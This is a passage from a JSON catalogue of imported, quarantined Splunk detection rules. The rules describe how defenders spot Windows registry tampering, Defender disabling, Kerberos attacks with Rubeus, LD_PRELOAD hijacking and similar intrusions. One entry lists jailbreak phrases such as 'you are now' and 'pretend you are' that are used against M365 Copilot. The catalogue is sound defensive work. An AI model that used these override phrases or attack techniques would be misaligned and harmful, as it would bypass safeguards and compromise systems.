If confirmed malicious, this modification could allow attackers to redirect update services, potentially leading to the execution of malicious code, further system compromise, and persistent evasion of security defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-updateserviceurlalternate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ca4e94fb-7969-4d63-8630-3625809a1f70", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_updateserviceurlalternate.yml" } }, { "id": "splunk-security-content-ca5327e1-0a91-4e23-bbd4-8901806c00e1", "type": "detection", "name": "Windows Firewall Rule Deletion", "description": "This detection identifies instances where a Windows Firewall rule has been deleted, potentially exposing the system to security risks. Unauthorized removal of firewall rules can indicate an attacker attempting to bypass security controls or malware disabling protections for persistence and command-and-control communication. The event logs details such as the deleted rule name, protocol, port, and the user responsible for the action. 
Security teams should monitor for unexpected deletions, correlate with related events, and investigate anomalies to prevent unauthorized access and maintain network security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-firewall-rule-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ca5327e1-0a91-4e23-bbd4-8901806c00e1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_firewall_rule_deletion.yml" } }, { "id": "splunk-security-content-ca96297f-e82e-4749-8cc9-d1ab555abb57", "type": "detection", "name": "Ollama Possible Memory Exhaustion Resource Abuse", "description": "Detects abnormal memory allocation patterns and excessive runner operations in Ollama that may indicate resource exhaustion attacks, memory abuse through malicious model loading, or attempts to degrade system performance by overwhelming GPU/CPU resources. 
Adversaries may deliberately load multiple large models, trigger repeated model initialization cycles, or exploit memory allocation mechanisms to exhaust available system resources, causing denial of service conditions or degrading performance for legitimate users.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1499" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-possible-memory-exhaustion-resource-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ca96297f-e82e-4749-8cc9-d1ab555abb57", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_possible_memory_exhaustion_resource_abuse.yml" } }, { "id": "splunk-security-content-cafa4bce-9f06-11ec-a7b2-acde48001122", "type": "detection", "name": "Windows Hide Notification Features Through Registry", "description": "The following analytic detects suspicious registry modifications aimed at hiding common Windows notification features on a compromised host. It leverages data from the Endpoint.Registry data model, focusing on specific registry paths and values. This activity is significant as it is often used by ransomware to obscure visual indicators, increasing the impact of the attack. 
If confirmed malicious, this could prevent users from noticing critical system alerts, thereby aiding the attacker in maintaining persistence and furthering their malicious activities undetected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-hide-notification-features-through-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cafa4bce-9f06-11ec-a7b2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_hide_notification_features_through_registry.yml" } }, { "id": "splunk-security-content-cb38ee66-8ae5-47de-bd66-231c7bbc0b2c", "type": "detection", "name": "Windows Phishing Recent ISO Exec Registry", "description": "The following analytic detects the creation of registry artifacts when an ISO container is opened, clicked, or mounted on a Windows operating system. It leverages data from the Endpoint.Registry data model, specifically monitoring registry keys related to recent ISO or IMG file executions. This activity is significant as adversaries increasingly use container-based phishing campaigns to bypass macro-based document execution controls. 
If confirmed malicious, this behavior could indicate an initial access attempt, potentially leading to further exploitation, persistence, or data exfiltration within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-phishing-recent-iso-exec-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cb38ee66-8ae5-47de-bd66-231c7bbc0b2c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_phishing_recent_iso_exec_registry.yml" } }, { "id": "splunk-security-content-cb56a1ea-e0b1-46d5-913f-e024cba40cbe", "type": "detection", "name": "Windows Archived Collected Data In TEMP Folder", "description": "The following analytic detects the creation of archived files in a temporary folder, which may contain collected data. This behavior is often associated with malicious activity, where attackers compress sensitive information before exfiltration. The detection focuses on monitoring specific directories, such as temp folders, for the presence of newly created archive files (e.g., .zip, .rar, .tar). 
By identifying this pattern, security teams can quickly respond to potential data collection and exfiltration attempts, minimizing the risk of data breaches and improving overall threat detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-archived-collected-data-in-temp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cb56a1ea-e0b1-46d5-913f-e024cba40cbe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_archived_collected_data_in_temp_folder.yml" } }, { "id": "splunk-security-content-cb6af2b3-29ab-441c-8d8d-679811c8b014", "type": "detection", "name": "CrowdStrike Falcon Stream Alerts", "description": "The following analytic leverages alerts from CrowdStrike Falcon Event Stream. This query aggregates and summarizes DetectionSummaryEvent and IdpDetectionSummaryEvent alerts from CrowdStrike Falcon Event Stream, providing details such as destination, user, severity, MITRE information, and CrowdStrike ID and links. The evals in the search do multiple things, including aligning the severity, ensuring the user, dest, title, description, and MITRE fields are set properly, and defining the drilldowns based on the type of alert. The search is highly dynamic to account for different alert types in which some fields may or may not be populated. 
Having all these fields properly set ensures the appropriate risk and analyst queue fields are correctly populated.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-falcon-stream-alerts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cb6af2b3-29ab-441c-8d8d-679811c8b014", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_falcon_stream_alerts.yml" } }, { "id": "splunk-security-content-cb6b339e-d4c6-11eb-a026-acde48001122", "type": "detection", "name": "Excessive Usage Of SC Service Utility", "description": "The following analytic detects excessive usage of the `sc.exe` service utility on a host machine. It leverages Sysmon EventCode 1 logs to identify instances where `sc.exe` is executed more frequently than normal within a 15-minute window. This behavior is significant as it is commonly associated with ransomware, cryptocurrency miners, and other malware attempting to create, modify, delete, or disable services, potentially related to security applications or for privilege escalation. 
If confirmed malicious, this activity could allow attackers to manipulate critical services, leading to system compromise or disruption of security defenses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-usage-of-sc-service-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cb6b339e-d4c6-11eb-a026-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_usage_of_sc_service_utility.yml" } }, { "id": "splunk-security-content-cb909b3e-512b-11ec-aa31-3e22fbd008af", "type": "detection", "name": "Possible Lateral Movement PowerShell Spawn", "description": "The following analytic detects the spawning of a PowerShell process as a child or grandchild of commonly abused processes like services.exe, wmiprvse.exe, svchost.exe, wsmprovhost.exe, and mmc.exe.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process names, as well as command-line executions.\nThis activity is significant as it could indicate lateral movement or remote code execution attempts by adversaries.\nIf confirmed malicious, this behavior could allow attackers to execute code remotely, escalate privileges, or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.003", "T1021.006", "T1047", "T1053.005", "T1059.001", 
"T1218.014", "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/possible-lateral-movement-powershell-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cb909b3e-512b-11ec-aa31-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/possible_lateral_movement_powershell_spawn.yml" } }, { "id": "splunk-security-content-cbb3cb84-c06f-4393-adcc-5cb6195621f1", "type": "detection", "name": "GCP Multiple Failed MFA Requests For User", "description": "The following analytic detects multiple failed multi-factor authentication (MFA) requests for a single user within a Google Cloud Platform (GCP) tenant. It triggers when 10 or more MFA prompts fail within a 5-minute window, using Google Workspace login failure events. This behavior is significant as it may indicate an adversary attempting to bypass MFA by bombarding the user with repeated authentication requests. 
If confirmed malicious, this activity could lead to unauthorized access, allowing attackers to compromise accounts and potentially escalate privileges within the GCP environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gcp-multiple-failed-mfa-requests-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cbb3cb84-c06f-4393-adcc-5cb6195621f1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gcp_multiple_failed_mfa_requests_for_user.yml" } }, { "id": "splunk-security-content-cbc95e44-7c22-443f-88fd-0424478f5589", "type": "detection", "name": "AWS ECR Container Scanning Findings Low Informational Unknown", "description": "The following analytic identifies low, informational, or unknown severity findings from AWS Elastic Container Registry (ECR) image scans. It leverages AWS CloudTrail logs, specifically the DescribeImageScanFindings event, to detect these findings. This activity is significant for a SOC as it helps in early identification of potential vulnerabilities or misconfigurations in container images, which could be exploited if left unaddressed. 
If confirmed malicious, these findings could lead to unauthorized access, data breaches, or further exploitation within the containerized environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-ecr-container-scanning-findings-low-informational-unknown.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cbc95e44-7c22-443f-88fd-0424478f5589", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_ecr_container_scanning_findings_low_informational_unknown.yml" } }, { "id": "splunk-security-content-cbe2ca30-631e-11ec-8670-acde48001122", "type": "detection", "name": "Linux Preload Hijack Library Calls", "description": "The following analytic detects the use of the LD_PRELOAD environment variable to hijack or hook library functions on a Linux platform. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because adversaries, malware authors, and red teamers commonly use this technique to gain elevated privileges and establish persistence on a compromised machine. 
If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, and maintain long-term access to the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-preload-hijack-library-calls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cbe2ca30-631e-11ec-8670-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_preload_hijack_library_calls.yml" } }, { "id": "splunk-security-content-cbe761fc-d945-4c8c-a71d-e26d12255d32", "type": "detection", "name": "Windows Steal Authentication Certificates - ESC1 Abuse", "description": "The following analytic detects when a new certificate is requested or granted against Active Directory Certificate Services (AD CS) using a Subject Alternative Name (SAN). It leverages Windows Security Event Codes 4886 and 4887 to identify these actions. This activity is significant because improperly configured certificate templates can be exploited for privilege escalation and environment compromise. 
If confirmed malicious, an attacker could gain elevated privileges or persist within the environment, potentially leading to unauthorized access to sensitive information and further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-esc1-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cbe761fc-d945-4c8c-a71d-e26d12255d32", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates___esc1_abuse.yml" } }, { "id": "splunk-security-content-cbef820c-e1ff-407f-887f-0a9240a2d477", "type": "detection", "name": "Detect Path Interception By Creation Of program exe", "description": "The following analytic identifies the creation of a program executable in an unquoted service path, a common technique for privilege escalation. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where the parent process is 'services.exe'. This activity is significant because unquoted service paths can be exploited by attackers to execute arbitrary code with elevated privileges. 
If confirmed malicious, this could allow an attacker to gain higher-level access, potentially leading to full system compromise and persistent control over the affected endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-path-interception-by-creation-of-program-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cbef820c-e1ff-407f-887f-0a9240a2d477", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_path_interception_by_creation_of_program_exe.yml" } }, { "id": "splunk-security-content-cc1448e3-cc7a-4518-bc9f-2fa48f61a22b", "type": "detection", "name": "Kubernetes Shell Running on Worker Node with CPU Activity", "description": "The following analytic identifies shell activity within the Kubernetes privilege scope on a worker node, specifically when shell processes are consuming CPU resources. It leverages process metrics from an OTEL collector hostmetrics receiver, pulled from Splunk Observability Cloud via the Splunk Infrastructure Monitoring Add-on, focusing on process.cpu.utilization and process.memory.utilization. This activity is significant as unauthorized shell processes can indicate a security threat, potentially compromising the node and the entire Kubernetes cluster. 
If confirmed malicious, attackers could gain full control over the host's resources, leading to data theft, service disruption, privilege escalation, and further attacks within the cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-shell-running-on-worker-node-with-cpu-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cc1448e3-cc7a-4518-bc9f-2fa48f61a22b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_shell_running_on_worker_node_with_cpu_activity.yml" } }, { "id": "splunk-security-content-cc26aba8-7f4a-4078-b91a-052d6a53cb13", "type": "detection", "name": "M365 Copilot Impersonation Jailbreak Attack", "description": "Detects M365 Copilot impersonation and roleplay jailbreak attempts where users try to manipulate the AI into adopting alternate personas, behaving as unrestricted entities, or impersonating malicious AI systems to bypass safety controls. The detection searches exported eDiscovery prompt logs for roleplay keywords like \"pretend you are,\" \"act as,\" \"you are now,\" \"amoral,\" and \"roleplay as\" in the Subject_Title field. Prompts are categorized into specific impersonation types (AI_Impersonation, Malicious_AI_Persona, Unrestricted_AI_Persona, etc.) 
to identify attempts to override the AI's safety guardrails through persona injection attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-impersonation-jailbreak-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cc26aba8-7f4a-4078-b91a-052d6a53cb13", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_impersonation_jailbreak_attack.yml" } }, { "id": "splunk-security-content-cc2a3425-2703-47e7-818f-3dca1b0bc56f", "type": "detection", "name": "Windows Impair Defense Set Win Defender Smart Screen Level To Warn", "description": "The following analytic detects modifications to the Windows registry that set the Windows Defender SmartScreen level to \"warn.\" This detection leverages data from the Endpoint.Registry data model, specifically monitoring changes to the ShellSmartScreenLevel registry value. This activity is significant because altering SmartScreen settings to \"warn\" can reduce immediate suspicion from users, allowing potentially malicious executables to run with just a warning prompt. 
If confirmed malicious, this could enable attackers to execute harmful files, increasing the risk of successful malware deployment and subsequent system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-set-win-defender-smart-screen-level-to-warn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cc2a3425-2703-47e7-818f-3dca1b0bc56f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_set_win_defender_smart_screen_level_to_warn.yml" } }, { "id": "splunk-security-content-cc316032-924a-11eb-91a2-acde48001122", "type": "detection", "name": "DSQuery Domain Discovery", "description": "The following analytic detects the execution of \"dsquery.exe\" with arguments targeting `TrustedDomain` queries directly from the command line. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process names and command-line arguments. This activity is significant as it often indicates domain trust discovery, a common step in lateral movement or privilege escalation by adversaries. 
If confirmed malicious, this could allow attackers to map domain trusts, potentially leading to further exploitation and unauthorized access to trusted domains.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/dsquery-domain-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cc316032-924a-11eb-91a2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/dsquery_domain_discovery.yml" } }, { "id": "splunk-security-content-cc391750-3024-11ec-955a-acde48001122", "type": "detection", "name": "Disable Defender MpEngine Registry", "description": "The following analytic detects the modification of the Windows Defender MpEngine registry value, specifically setting MpEnablePus to 0x00000000. This detection leverages endpoint registry logs, focusing on changes within the path \"*\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\MpEngine*\". This activity is significant as it indicates an attempt to disable key Windows Defender features, potentially allowing malware to evade detection. If confirmed malicious, this could lead to undetected malware execution, persistence, and further system compromise. 
Immediate investigation and endpoint isolation are recommended.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-defender-mpengine-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cc391750-3024-11ec-955a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_defender_mpengine_registry.yml" } }, { "id": "splunk-security-content-cc590c66-f65f-48f2-986a-4797244762f8", "type": "detection", "name": "Detect Software Download To Network Device", "description": "The following analytic identifies unauthorized software downloads to network devices via TFTP, FTP, or SSH/SCP. It detects this activity by analyzing network traffic events on specific ports (69, 21, 22) from devices categorized as network, router, or switch. This activity is significant because adversaries may exploit netbooting to load unauthorized operating systems, potentially compromising network integrity. 
If confirmed malicious, this could lead to unauthorized control over network devices, enabling further attacks, data exfiltration, or persistent access within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1542.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-software-download-to-network-device.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cc590c66-f65f-48f2-986a-4797244762f8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_software_download_to_network_device.yml" } }, { "id": "splunk-security-content-cc695238-3117-4e60-aa83-4beac2a42c69", "type": "detection", "name": "Cisco NVM - Curl Execution With Insecure Flags", "description": "This analytic detects the use of `curl.exe` with insecure flags such as `-k`, `--insecure`, `--proxy-insecure`, or `--doh-insecure`\nwhich disable TLS certificate validation.\nIt leverages Cisco Network Visibility Module (NVM) flow data and process arguments\nto identify outbound connections initiated by curl where TLS checks were explicitly disabled.\nThis behavior may indicate an attempt to bypass certificate validation to connect to potentially untrusted or malicious endpoints,\na common tactic in red team operations, malware staging, or data exfiltration over HTTPS.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, 
"source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-curl-execution-with-insecure-flags.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cc695238-3117-4e60-aa83-4beac2a42c69", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___curl_execution_with_insecure_flags.yml" } }, { "id": "splunk-security-content-cca37478-8377-11ec-b59a-acde48001122", "type": "detection", "name": "Rubeus Command Line Parameters", "description": "The following analytic detects the use of Rubeus command line parameters, a toolset for Kerberos attacks within Active Directory environments. It leverages Endpoint Detection and Response (EDR) data to identify specific command-line arguments associated with actions like ticket manipulation, kerberoasting, and password spraying. This activity is significant as Rubeus is commonly used by adversaries to exploit Kerberos for privilege escalation and lateral movement. 
If confirmed malicious, this could lead to unauthorized access, persistence, and potential compromise of sensitive information within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550.003", "T1558.003", "T1558.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rubeus-command-line-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cca37478-8377-11ec-b59a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rubeus_command_line_parameters.yml" } }, { "id": "splunk-security-content-ccad96d7-a48c-4f13-8b9c-9f6a31cba454", "type": "detection", "name": "Detect Remote Access Software Usage FileInfo", "description": "The following analytic detects the execution of processes with file or code signing attributes from known remote access software within the environment. It leverages Sysmon EventCode 1 data and cross-references a lookup table of remote access utilities such as AnyDesk, GoToMyPC, LogMeIn, and TeamViewer. This activity is significant as adversaries often use these tools to maintain unauthorized remote access. 
If confirmed malicious, this could allow attackers to persist in the environment, potentially leading to data exfiltration or further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-remote-access-software-usage-fileinfo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ccad96d7-a48c-4f13-8b9c-9f6a31cba454", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_remote_access_software_usage_fileinfo.yml" } }, { "id": "splunk-security-content-ccb98a66-5851-11ec-b91c-acde48001122", "type": "detection", "name": "MSI Module Loaded by Non-System Binary", "description": "The following analytic detects the loading of `msi.dll` by a binary not located in `system32`, `syswow64`, `winsxs`, or `windows` directories. This is identified using Sysmon EventCode 7, which logs DLL loads, and filters out legitimate system paths. This activity is significant as it may indicate exploitation of CVE-2021-41379 or DLL side-loading attacks, both of which can lead to unauthorized system modifications. 
